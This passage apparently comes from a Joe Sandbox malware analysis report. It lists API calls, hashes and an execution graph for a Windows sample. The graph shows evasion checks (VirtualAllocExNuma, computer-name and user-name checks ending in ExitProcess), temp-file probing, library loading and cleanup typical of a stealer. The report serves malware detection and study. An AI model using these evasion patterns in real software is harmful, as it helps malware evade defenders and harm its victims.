                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                            • String ID:
                                                            • API String ID: 3170801528-0
                                                            • Opcode ID: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
                                                            • Instruction ID: 3ce10652a8950d72996287bf25eea4c24de180664f8138ca49c06b51137097dc
                                                            • Opcode Fuzzy Hash: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
                                                            • Instruction Fuzzy Hash: 3A01D232E01715ABCB21AF38A80679D77A0BF04729F053126E850776D2C7346EC1CBD6
                                                            APIs
                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000), ref: 00DE0706
                                                            • GetLastError.KERNEL32(?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000,00000000,00000000,?,00DD80CB,00000000), ref: 00DE0712
                                                              • Part of subcall function 00DE06D8: CloseHandle.KERNEL32(FFFFFFFE,00DE0722,?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000,00000000,00000000), ref: 00DE06E8
                                                            • ___initconout.LIBCMT ref: 00DE0722
                                                              • Part of subcall function 00DE069A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DE06C9,00DDF700,00000000,?,00DD7B44,00000000,00000000,00000000,00000000), ref: 00DE06AD
                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000,00000000), ref: 00DE0737
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                            • String ID:
                                                            • API String ID: 2744216297-0
                                                            • Opcode ID: f2fcf4ee33fe96363edde5bcda5a6359875987c1c0e34a400f7dd16a9b3b9a3f
                                                            • Instruction ID: 6e869890880012ea1d81b56a88001954b552af9f5f091d71c543db0729491adb
                                                            • Opcode Fuzzy Hash: f2fcf4ee33fe96363edde5bcda5a6359875987c1c0e34a400f7dd16a9b3b9a3f
                                                            • Instruction Fuzzy Hash: 6CF037360002D4BBCF223F95DC48A993FA6FB493A1F044014F91DDA230CA718960DFB0
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00DCA09F
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00DCA153
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 3480331319-1018135373
                                                            • Opcode ID: cd65b378ee47ae0fef5466525c5fae4911541ce5b03a591d985d9f35fbec0630
                                                            • Instruction ID: 49f12ae90fc3ddd1172e630d2e270c8598bd62196e769d0b02779ecba12e2f10
                                                            • Opcode Fuzzy Hash: cd65b378ee47ae0fef5466525c5fae4911541ce5b03a591d985d9f35fbec0630
                                                            • Instruction Fuzzy Hash: 0C416D34A0035A9BCF109F69C881F9EBBA5AF45328F188159E8149B352C731DA45CBB2
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?), ref: 00DCA992
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID: MOC$RCC
                                                            • API String ID: 2118026453-2084237596
                                                            • Opcode ID: eacebe30a8a42c83f20eb88152b4deca6eab5df301d4b066bfcbfbddb8e38dc0
                                                            • Instruction ID: 85ea7d666bfdcffb292f8bc1ce75bc849c91257fac87bff9f312df5ecb64d335
                                                            • Opcode Fuzzy Hash: eacebe30a8a42c83f20eb88152b4deca6eab5df301d4b066bfcbfbddb8e38dc0
                                                            • Instruction Fuzzy Hash: 9D41277290020EAFCF16DF98C981FAEBBB5FF48308F198159FA04A7211D7359951DB62
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC7643
                                                            • ___raise_securityfailure.LIBCMT ref: 00DC772B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                            • String ID: p
                                                            • API String ID: 3761405300-2678736219
                                                            • Opcode ID: 03a5298e4b15c0402d55fca79b751c3c7594b43db4370f54d2c9f91d21d8eb9b
                                                            • Instruction ID: 7015bb69a76ea4863690e31360d644fd270fae63376f89d2537ee86c7067a74c
                                                            • Opcode Fuzzy Hash: 03a5298e4b15c0402d55fca79b751c3c7594b43db4370f54d2c9f91d21d8eb9b
                                                            • Instruction Fuzzy Hash: 2221F8B9541300DEE750DF26F985B503BA4FB8A300F10586AE509EBBB0E770994AEF55
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC774B
                                                            • ___raise_securityfailure.LIBCMT ref: 00DC7808
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                            • String ID: p
                                                            • API String ID: 3761405300-2678736219
                                                            • Opcode ID: 813087bd86fc07d5475b6d8c71e729e44ff301d6ab005deeabb2e2dbb27ded70
                                                            • Instruction ID: 9f055c581539ad7ebd0c1d5c516cf558084f74b5a9d273409d40801a996ab208
                                                            • Opcode Fuzzy Hash: 813087bd86fc07d5475b6d8c71e729e44ff301d6ab005deeabb2e2dbb27ded70
                                                            • Instruction Fuzzy Hash: 0711A2BD911304DFE740DF27E9816407BB4BB8A300B0059AAE509A7BB0E770954BEF56
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00DC15E6
                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DC161E
                                                              • Part of subcall function 00DC5178: _Yarn.LIBCPMT ref: 00DC5197
                                                              • Part of subcall function 00DC5178: _Yarn.LIBCPMT ref: 00DC51BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                            • String ID: bad locale name
                                                            • API String ID: 1908188788-1405518554
                                                            • Opcode ID: f55f18de331278a31eaf97be91cf13dddc3241931170b1e98da5f79642768890
                                                            • Instruction ID: 77d50c8dde2aa942cbdb9b03399c1b0d2df21d2b109639bafffb810c110a4da5
                                                            • Opcode Fuzzy Hash: f55f18de331278a31eaf97be91cf13dddc3241931170b1e98da5f79642768890
                                                            • Instruction Fuzzy Hash: 44F017B5545B919E83319F7A9481947FBE4FE293103948A2EE0DEC3A12D730A404CB7A

                                                            Execution Graph

                                                            Execution Coverage:14.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:2.6%
                                                            Total number of Nodes:1286
                                                            Total number of Limit Nodes:39
                                                            execution_graph 21658 4185be 21659 4185c0 21658->21659 21710 402b6b 21659->21710 21668 401284 25 API calls 21669 4185ef 21668->21669 21670 401284 25 API calls 21669->21670 21671 4185f9 21670->21671 21814 40148a GetPEB 21671->21814 21673 418603 21674 401284 25 API calls 21673->21674 21675 41860d 21674->21675 21676 401284 25 API calls 21675->21676 21677 418617 21676->21677 21678 401284 25 API calls 21677->21678 21679 418621 21678->21679 21815 4014a2 GetPEB 21679->21815 21681 41862b 21682 401284 25 API calls 21681->21682 21683 418635 21682->21683 21684 401284 25 API calls 21683->21684 21685 41863f 21684->21685 21686 401284 25 API calls 21685->21686 21687 418649 21686->21687 21816 4014f9 21687->21816 21690 401284 25 API calls 21691 41865d 21690->21691 21692 401284 25 API calls 21691->21692 21693 418667 21692->21693 21694 401284 25 API calls 21693->21694 21695 418671 21694->21695 21839 401666 GetTempPathW 21695->21839 21698 401284 25 API calls 21699 418680 21698->21699 21700 401284 25 API calls 21699->21700 21701 41868a 21700->21701 21702 401284 25 API calls 21701->21702 21703 418694 21702->21703 21851 417151 21703->21851 21706 41869f 21707 417151 302 API calls 21707->21706 21957 4047e8 GetProcessHeap HeapAlloc 21710->21957 21713 4047e8 3 API calls 21714 402b96 21713->21714 21715 4047e8 3 API calls 21714->21715 21716 402baf 21715->21716 21717 4047e8 3 API calls 21716->21717 21718 402bc6 21717->21718 21719 4047e8 3 API calls 21718->21719 21720 402bdd 21719->21720 21721 4047e8 3 API calls 21720->21721 21722 402bf3 21721->21722 21723 4047e8 3 API calls 21722->21723 21724 402c0a 21723->21724 21725 4047e8 3 API calls 21724->21725 21726 402c21 21725->21726 21727 4047e8 3 API calls 21726->21727 21728 402c3b 21727->21728 21729 4047e8 3 API calls 21728->21729 21730 402c52 21729->21730 21731 4047e8 3 API calls 21730->21731 21732 402c69 21731->21732 21733 4047e8 3 API calls 21732->21733 21734 402c80 21733->21734 21735 4047e8 3 API calls 21734->21735 21736 402c96 21735->21736 21737 4047e8 3 API calls 21736->21737 21738 402cad 21737->21738 21739 4047e8 3 API calls 21738->21739 21740 402cc4 21739->21740 21741 4047e8 3 API calls 21740->21741 21742 402cdb 21741->21742 21743 4047e8 3 API calls 21742->21743 21744 402cf5 21743->21744 21745 4047e8 3 API calls 21744->21745 21746 402d0c 21745->21746 21747 4047e8 3 API calls 21746->21747 21748 402d23 21747->21748 21749 4047e8 3 API calls 21748->21749 21750 402d3a 21749->21750 21751 4047e8 3 API calls 21750->21751 21752 402d51 21751->21752 21753 4047e8 3 API calls 21752->21753 21754 402d68 21753->21754 21755 4047e8 3 API calls 21754->21755 21756 402d7f 21755->21756 21757 4047e8 3 API calls 21756->21757 21758 402d95 21757->21758 21759 4047e8 3 API calls 21758->21759 21760 402daf 21759->21760 21761 4047e8 3 API calls 21760->21761 21762 402dc6 21761->21762 21763 4047e8 3 API calls 21762->21763 21764 402ddd 21763->21764 21765 4047e8 3 API calls 21764->21765 21766 402df4 21765->21766 21767 4047e8 3 API calls 21766->21767 21768 402e0a 21767->21768 21769 4047e8 3 API calls 21768->21769 21770 402e21 21769->21770 21771 4047e8 3 API calls 21770->21771 21772 402e38 21771->21772 21773 4047e8 3 API calls 21772->21773 21774 402e4f 21773->21774 21775 4047e8 3 API calls 21774->21775 21776 402e69 21775->21776 21777 4047e8 3 API calls 21776->21777 21778 402e80 21777->21778 21779 4047e8 3 API calls 21778->21779 21780 402e97 21779->21780 21781 4047e8 3 API calls 21780->21781 21782 402ead 21781->21782 21783 4047e8 3 API calls 21782->21783 21784 402ec4 21783->21784 21785 4047e8 3 API calls 21784->21785 21786 402edb 21785->21786 21787 4047e8 3 API calls 21786->21787 21788 402eef 21787->21788 21789 4047e8 3 API calls 21788->21789 21790 402f06 21789->21790 21791 418753 21790->21791 21961 4186aa GetPEB 21791->21961 21793 418982 LoadLibraryA 21794 4185d1 21793->21794 21796 4010f0 GetCurrentProcess VirtualAllocExNuma 21794->21796 21795 418759 21795->21793 21797 401111 ExitProcess 21796->21797 21798 401098 VirtualAlloc 21796->21798 21801 4010b8 _memset 21798->21801 21800 4010ec 21803 401284 21800->21803 21801->21800 21802 4010d5 VirtualFree 21801->21802 21802->21800 21804 4012ac _memset 21803->21804 21805 4012bb 13 API calls 21804->21805 21962 410c85 GetProcessHeap HeapAlloc GetComputerNameA 21805->21962 21807 4013e9 21964 41d12a 21807->21964 21811 4013f4 21811->21668 21812 4013b9 21812->21807 21813 4013e2 ExitProcess 21812->21813 21814->21673 21815->21681 21974 4014ad GetPEB 21816->21974 21819 4014ad 2 API calls 21820 401516 21819->21820 21821 4014ad 2 API calls 21820->21821 21838 4015a1 21820->21838 21822 401529 21821->21822 21823 4014ad 2 API calls 21822->21823 21822->21838 21824 401538 21823->21824 21825 4014ad 2 API calls 21824->21825 21824->21838 21826 401547 21825->21826 21827 4014ad 2 API calls 21826->21827 21826->21838 21828 401556 21827->21828 21829 4014ad 2 API calls 21828->21829 21828->21838 21830 401565 21829->21830 21831 4014ad 2 API calls 21830->21831 21830->21838 21832 401574 21831->21832 21833 4014ad 2 API calls 21832->21833 21832->21838 21834 401583 21833->21834 21835 4014ad 2 API calls 21834->21835 21834->21838 21836 401592 21835->21836 21837 4014ad 2 API calls 21836->21837 21836->21838 21837->21838 21838->21690 21840 4016a4 wsprintfW 21839->21840 21841 4017f7 21839->21841 21842 4016d0 CreateFileW 21840->21842 21843 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21841->21843 21842->21841 21844 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 21842->21844 21845 401807 21843->21845 21846 401754 _memset 21844->21846 21845->21698 21846->21841 21847 401733 WriteFile 21846->21847 21848 401768 CloseHandle CreateFileW 21846->21848 21850 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 21846->21850 21847->21841 21847->21846 21848->21841 21849 40179e ReadFile 21848->21849 21849->21841 21849->21846 21850->21841 21850->21842 21852 417161 21851->21852 21978 410c53 GetProcessHeap HeapAlloc GetUserNameA 21852->21978 21854 417190 21979 402f12 21854->21979 21857 418a63 6 API calls 21897 4173da 21857->21897 21859 4176b3 21860 417714 CreateDirectoryA 21859->21860 21861 417731 21860->21861 22546 4169b6 21861->22546 21863 41773e 22551 4109a2 21863->22551 21865 417830 22562 404b2e 21865->22562 21869 417854 22578 405f39 21869->22578 21873 4178b2 21874 405f39 10 API calls 21873->21874 21875 4178dc 21874->21875 22592 413259 strtok_s 21875->22592 21877 4178ef 21878 405f39 10 API calls 21877->21878 21879 41791f 21878->21879 22596 413390 strtok_s 21879->22596 21881 417932 22600 413b86 21881->22600 21883 417948 22646 405237 21883->22646 21885 41796c 22652 40eabc 21885->22652 21887 4179a0 21888 417a18 21887->21888 21890 405f39 10 API calls 21887->21890 21889 417a99 21888->21889 21892 405f39 10 API calls 21888->21892 21891 405f39 10 API calls 21889->21891 21893 4179dc 21890->21893 21894 417ad2 21891->21894 21895 417a5b 21892->21895 22683 4134d8 strtok_s strtok_s 21893->22683 22667 4135a8 strtok_s 21894->22667 22685 413198 strtok_s strtok_s 21895->22685 21909 41768f 21897->21909 22534 41257f 21897->22534 21900 4179ef 22684 40274e 59 API calls 21900->22684 21901 417ae5 22674 415392 21901->22674 21902 417a6e 22686 41310c 17 API calls 21902->22686 21908 41cd7f 10 API calls 21908->21909 22542 411c4a 21909->22542 21910 417b0e 21912 417b3a 21910->21912 22687 41566f 59 API calls 2 library calls 21910->22687 21913 417b5c 21912->21913 22689 415df7 60 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21912->22689 21917 417b7e 21913->21917 22690 416330 59 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21913->22690 21914 417b2e 22688 4170c7 140 API calls 21914->22688 21919 417ba0 21917->21919 22691 4164bd 59 API calls 2 library calls 21917->22691 21922 417bd7 21919->21922 22692 411f55 12 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21919->22692 21923 417c54 21922->21923 21925 405f39 10 API calls 21922->21925 21924 405f39 10 API calls 21923->21924 21936 417c86 21924->21936 21926 417c16 21925->21926 22693 413198 strtok_s strtok_s 21926->22693 21928 417c29 22694 41310c 17 API calls 21928->22694 21931 418109 22679 418381 21931->22679 21933 41812c 21934 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21933->21934 21935 41821d 21934->21935 21935->21707 21947 41cd7f 21935->21947 21950 418a63 21935->21950 21937 41257f 8 API calls 21936->21937 21946 4180d1 21936->21946 21938 417f41 21937->21938 21938->21946 22695 41ce34 malloc WriteFile 21938->22695 21940 417f59 22696 405482 21940->22696 21944 4180a6 22710 41310c 17 API calls 21944->22710 22678 412541 SHFileOperationA 21946->22678 23107 41cccb malloc 21947->23107 21949 41cd8f 21949->21706 21951 418ee2 LoadLibraryA 21950->21951 21956 418a70 21950->21956 21952 418eff LoadLibraryA LoadLibraryA 21951->21952 21953 418f32 LoadLibraryA LoadLibraryA LoadLibraryA 21952->21953 21955 418f83 21953->21955 21955->21706 21956->21951 21958 402b7f 21957->21958 21959 40480f 21957->21959 21958->21713 21960 404818 lstrlenA 21959->21960 21960->21958 21960->21960 21961->21795 21963 401385 21962->21963 21963->21807 21972 410c53 GetProcessHeap HeapAlloc GetUserNameA 21963->21972 21965 41d132 21964->21965 21966 41d134 IsDebuggerPresent 21964->21966 21965->21811 21973 41da95 21966->21973 21969 41d574 SetUnhandledExceptionFilter UnhandledExceptionFilter 21970 41d591 __call_reportfault 21969->21970 21971 41d599 GetCurrentProcess TerminateProcess 21969->21971 21970->21971 21971->21811 21972->21812 21973->21969 21975 4014e9 21974->21975 21976 4014d9 lstrcmpiW 21975->21976 21977 4014ef 21975->21977 21976->21975 21976->21977 21977->21819 21977->21838 21978->21854 21980 4047e8 3 API calls 21979->21980 21981 402f27 21980->21981 21982 4047e8 3 API calls 21981->21982 21983 402f3e 21982->21983 21984 4047e8 3 API calls 21983->21984 21985 402f55 21984->21985 21986 4047e8 3 API calls 21985->21986 21987 402f6c 21986->21987 21988 4047e8 3 API calls 21987->21988 21989 402f85 21988->21989 21990 4047e8 3 API calls 21989->21990 21991 402f9c 21990->21991 21992 4047e8 3 API calls 21991->21992 21993 402fb3 21992->21993 21994 4047e8 3 API calls 21993->21994 21995 402fca 21994->21995 21996 4047e8 3 API calls 21995->21996 21997 402fe4 21996->21997 21998 4047e8 3 API calls 21997->21998 21999 402ffb 21998->21999 22000 4047e8 3 API calls 21999->22000 22001 403011 22000->22001 22002 4047e8 3 API calls 22001->22002 22003 403028 22002->22003 22004 4047e8 3 API calls 22003->22004 22005 40303f 22004->22005 22006 4047e8 3 API calls 22005->22006 22007 403056 22006->22007 22008 4047e8 3 API calls 22007->22008 22009 40306d 22008->22009 22010 4047e8 3 API calls 22009->22010 22011 403084 22010->22011 22012 4047e8 3 API calls 22011->22012 22013 40309b 22012->22013 22014 4047e8 3 API calls 22013->22014 22015 4030b2 22014->22015 22016 4047e8 3 API calls 22015->22016 22017 4030c9 22016->22017 22018 4047e8 3 API calls 22017->22018 22019 4030df 22018->22019 22020 4047e8 3 API calls 22019->22020 22021 4030f6 22020->22021 22022 4047e8 3 API calls 22021->22022 22023 40310f 22022->22023 22024 4047e8 3 API calls 22023->22024 22025 403123 22024->22025 22026 4047e8 3 API calls 22025->22026 22027 40313a 22026->22027 22028 4047e8 3 API calls 22027->22028 22029 403154 22028->22029 22030 4047e8 3 API calls 22029->22030 22031 40316b 22030->22031 22032 4047e8 3 API calls 22031->22032 22033 403182 22032->22033 22034 4047e8 3 API calls 22033->22034 22035 403199 22034->22035 22036 4047e8 3 API calls 22035->22036 22037 4031af 22036->22037 22038 4047e8 3 API calls 22037->22038 22039 4031c5 22038->22039 22040 4047e8 3 API calls 22039->22040 22041 4031dc 22040->22041 22042 4047e8 3 API calls 22041->22042 22043 4031f2 22042->22043 22044 4047e8 3 API calls 22043->22044 22045 40320c 22044->22045 22046 4047e8 3 API calls 22045->22046 22047 403223 22046->22047 22048 4047e8 3 API calls 22047->22048 22049 40323a 22048->22049 22050 4047e8 3 API calls 22049->22050 22051 403250 22050->22051 22052 4047e8 3 API calls 22051->22052 22053 403267 22052->22053 22054 4047e8 3 API calls 22053->22054 22055 40327e 22054->22055 22056 4047e8 3 API calls 22055->22056 22057 403295 22056->22057 22058 4047e8 3 API calls 22057->22058 22059 4032ab 22058->22059 22060 4047e8 3 API calls 22059->22060 22061 4032c2 22060->22061 22062 4047e8 3 API calls 22061->22062 22063 4032d9 22062->22063 22064 4047e8 3 API calls 22063->22064 22065 4032f0 22064->22065 22066 4047e8 3 API calls 22065->22066 22067 403306 22066->22067 22068 4047e8 3 API calls 22067->22068 22069 40331c 22068->22069 22070 4047e8 3 API calls 22069->22070 22071 403333 22070->22071 22072 4047e8 3 API calls 22071->22072 22073 403349 22072->22073 22074 4047e8 3 API calls 22073->22074 22075 40335d 22074->22075 22076 4047e8 3 API calls 22075->22076 22077 403374 22076->22077 22078 4047e8 3 API calls 22077->22078 22079 40338a 22078->22079 22080 4047e8 3 API calls 22079->22080 22081 4033a1 22080->22081 22082 4047e8 3 API calls 22081->22082 22083 4033b8 22082->22083 22084 4047e8 3 API calls 22083->22084 22085 4033cf 22084->22085 22086 4047e8 3 API calls 22085->22086 22087 4033e6 22086->22087 22088 4047e8 3 API calls 22087->22088 22089 4033fd 22088->22089 22090 4047e8 3 API calls 22089->22090 22091 403414 22090->22091 22092 4047e8 3 API calls 22091->22092 22093 40342e 22092->22093 22094 4047e8 3 API calls 22093->22094 22095 403445 22094->22095 22096 4047e8 3 API calls 22095->22096 22097 40345c 22096->22097 22098 4047e8 3 API calls 22097->22098 22099 403473 22098->22099 22100 4047e8 3 API calls 22099->22100 22101 40348a 22100->22101 22102 4047e8 3 API calls 22101->22102 22103 4034a1 22102->22103 22104 4047e8 3 API calls 22103->22104 22105 4034b8 22104->22105 22106 4047e8 3 API calls 22105->22106 22107 4034cf 22106->22107 22108 4047e8 3 API calls 22107->22108 22109 4034e9 22108->22109 22110 4047e8 3 API calls 22109->22110 22111 403500 22110->22111 22112 4047e8 3 API calls 22111->22112 22113 403517 22112->22113 22114 4047e8 3 API calls 22113->22114 22115 40352e 22114->22115 22116 4047e8 3 API calls 22115->22116 22117 403545 22116->22117 22118 4047e8 3 API calls 22117->22118 22119 40355c 22118->22119 22120 4047e8 3 API calls 22119->22120 22121 403573 22120->22121 22122 4047e8 3 API calls 22121->22122 22123 40358a 22122->22123 22124 4047e8 3 API calls 22123->22124 22125 4035a4 22124->22125 22126 4047e8 3 API calls 22125->22126 22127 4035bb 22126->22127 22128 4047e8 3 API calls 22127->22128 22129 4035d2 22128->22129 22130 4047e8 3 API calls 22129->22130 22131 4035e9 22130->22131 22132 4047e8 3 API calls 22131->22132 22133 403600 22132->22133 22134 4047e8 3 API calls 22133->22134 22135 403617 22134->22135 22136 4047e8 3 API calls 22135->22136 22137 40362d 22136->22137 22138 4047e8 3 API calls 22137->22138 22139 403643 22138->22139 22140 4047e8 3 API calls 22139->22140 22141 40365d 22140->22141 22142 4047e8 3 API calls 22141->22142 22143 403674 22142->22143 22144 4047e8 3 API calls 22143->22144 22145 40368b 22144->22145 22146 4047e8 3 API calls 22145->22146 22147 4036a1 22146->22147 22148 4047e8 3 API calls 22147->22148 22149 4036b8 22148->22149 22150 4047e8 3 API calls 22149->22150 22151 4036cf 22150->22151 22152 4047e8 3 API calls 22151->22152 22153 4036e3 22152->22153 22154 4047e8 3 API calls 22153->22154 22155 4036f9 22154->22155 22156 4047e8 3 API calls 22155->22156 22157 403713 22156->22157 22158 4047e8 3 API calls 22157->22158 22159 40372a 22158->22159 22160 4047e8 3 API calls 22159->22160 22161 403741 22160->22161 22162 4047e8 3 API calls 22161->22162 22163 403758 22162->22163 22164 4047e8 3 API calls 22163->22164 22165 40376f 22164->22165 22166 4047e8 3 API calls 22165->22166 22167 403786 22166->22167 22168 4047e8 3 API calls 22167->22168 22169 40379a 22168->22169 22170 4047e8 3 API calls 22169->22170 22171 4037b1 22170->22171 22172 4047e8 3 API calls 22171->22172 22173 4037cb 22172->22173 22174 4047e8 3 API calls 22173->22174 22175 4037e2 22174->22175 22176 4047e8 3 API calls 22175->22176 22177 4037f6 22176->22177 22178 4047e8 3 API calls 22177->22178 22179 40380a 22178->22179 22180 4047e8 3 API calls 22179->22180 22181 403821 22180->22181 22182 4047e8 3 API calls 22181->22182 22183 403838 22182->22183 22184 4047e8 3 API calls 22183->22184 22185 40384f 22184->22185 22186 4047e8 3 API calls 22185->22186 22187 403866 22186->22187 22188 4047e8 3 API calls 22187->22188 22189 403880 22188->22189 22190 4047e8 3 API calls 22189->22190 22191 403897 22190->22191 22192 4047e8 3 API calls 22191->22192 22193 4038ae 22192->22193 22194 4047e8 3 API calls 22193->22194 22195 4038c5 22194->22195 22196 4047e8 3 API calls 22195->22196 22197 4038db 22196->22197 22198 4047e8 3 API calls 22197->22198 22199 4038f2 22198->22199 22200 4047e8 3 API calls 22199->22200 22201 403906 22200->22201 22202 4047e8 3 API calls 22201->22202 